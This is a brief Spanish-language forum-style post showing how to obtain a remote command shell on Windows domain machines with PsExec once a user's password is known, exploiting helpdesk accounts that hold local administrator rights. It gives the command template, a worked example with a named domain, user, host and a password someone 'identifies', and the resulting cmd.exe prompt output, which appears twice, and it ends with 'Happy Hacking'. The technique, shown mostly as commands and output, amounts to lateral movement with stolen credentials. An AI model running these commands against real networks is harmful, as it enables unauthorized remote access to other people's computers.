Si ud tiene un usuario de un dominio windows, se puede obtener shell remota en los hosts donde este usuario pertenesca localmente al grupo local "administradores" o "administrators". Solo se debe usar el programa "psexec" así:
CODE
#psexec \\hostname -u dominio\usuario -p claveusuario cmd.exe
En varias empresas por cuestiones de helpdesk, se tiene la mala práctica de darle esos permisos al grupo de soporte.
Por ejemplo, si el dominio es "cuteam" y el usuario "alluz" pertenece al grupo "administradores" en el equipo "pepeluis" (que pertenece a Flacman), si Jattx identifica que mi clave es "alluzeselmejor", puede obtener consola así:
CODE
#psexec \\PEPELUIS -u cuteam\alluz -p alluzeselmejor cmd.exe
PsExec v1.62 - Execute processes remotely
Copyright (C) 2001-2005 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>prompt %computername% - #
PEPELUIS - #
PsExec v1.62 - Execute processes remotely
Copyright (C) 2001-2005 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>prompt %computername% - #
PEPELUIS - #
Happy Hacking.
saludos